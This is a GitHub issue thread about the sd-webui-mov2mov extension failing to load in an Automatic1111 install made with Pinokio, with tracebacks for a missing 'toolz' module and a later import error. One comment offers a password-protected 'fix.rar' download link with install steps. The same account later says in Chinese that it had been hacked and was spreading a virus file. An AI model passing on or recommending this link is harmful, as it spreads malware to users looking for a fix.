Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Error installing mov2mov in Automatic1111 that installed by Pinokio #159

Closed
DAWiguna opened this issue Aug 26, 2024 · 8 comments
Closed

Comments

@DAWiguna
Copy link

After installing the mov2mov extension and rerun, the terminal show this error:

*** Error loading script: mov2mov.py
Traceback (most recent call last):
File "D:\pinokio\api\automatic1111.git\app\modules\scripts.py", line 515, in load_scripts
script_module = script_loading.load_module(scriptfile.path)
File "D:\pinokio\api\automatic1111.git\app\modules\script_loading.py", line 13, in load_module
module_spec.loader.exec_module(module)
File "", line 883, in exec_module
File "", line 241, in call_with_frames_removed
File "D:\pinokio\api\automatic1111.git\app\extensions\sd-webui-mov2mov\scripts\mov2mov.py", line 24, in
from ebsynth import EbsynthGenerate, Keyframe
File "D:\pinokio\api\automatic1111.git\app\extensions\sd-webui-mov2mov\ebsynth_init
.py", line 2, in
from .ebsynth_generate import EbsynthGenerate, Keyframe, Sequence, EbSynthTask
File "D:\pinokio\api\automatic1111.git\app\extensions\sd-webui-mov2mov\ebsynth\ebsynth_generate.py", line 5, in
from toolz import groupby
ModuleNotFoundError: No module named 'toolz'

@MinecraftEarthVillage
Copy link

Download
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

@sawaaki
Copy link

sawaaki commented Aug 30, 2024

I am the same. Please help me.

@Andersen1729
Copy link

Me too

@QuentinRiviere
Copy link

See my comment : #158 (comment)

@sawaaki
Copy link

sawaaki commented Sep 6, 2024

Thank you!!!! I can use it now!

@MinecraftEarthVillage
Copy link

十分抱歉 !我的账户在前段时间被黑客盗用,并且传播相同的病毒文件,如果你们遇到要下载一个fix.zip的千万不要下载!就是它导致我账户被攻占的

@omidud
Copy link

omidud commented Sep 22, 2024

*** Error loading script: m2m_ui.py
Traceback (most recent call last):
File "C:\python_projects\stable-diffusion-webui-master\modules\scripts.py", line 515, in load_scripts
script_module = script_loading.load_module(scriptfile.path)
File "C:\python_projects\stable-diffusion-webui-master\modules\script_loading.py", line 13, in load_module
module_spec.loader.exec_module(module)
File "", line 883, in exec_module
File "", line 241, in _call_with_frames_removed
File "C:\python_projects\stable-diffusion-webui-master\extensions\sd-webui-mov2mov\scripts\m2m_ui.py", line 23, in
from modules.ui import (
ImportError: cannot import name 'create_sampler_and_steps_selection' from 'modules.ui' (C:\python_projects\stable-diffusion-webui-master\modules\ui.py)


@ztlsir
Copy link

ztlsir commented Dec 4, 2024

*** Error loading script: m2m_ui.py Traceback (most recent call last): File "C:\python_projects\stable-diffusion-webui-master\modules\scripts.py", line 515, in load_scripts script_module = script_loading.load_module(scriptfile.path) File "C:\python_projects\stable-diffusion-webui-master\modules\script_loading.py", line 13, in load_module module_spec.loader.exec_module(module) File "", line 883, in exec_module File "", line 241, in _call_with_frames_removed File "C:\python_projects\stable-diffusion-webui-master\extensions\sd-webui-mov2mov\scripts\m2m_ui.py", line 23, in from modules.ui import ( ImportError: cannot import name 'create_sampler_and_steps_selection' from 'modules.ui' (C:\python_projects\stable-diffusion-webui-master\modules\ui.py)

how to fix it?i think its not support lastest sd ui

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

9 participants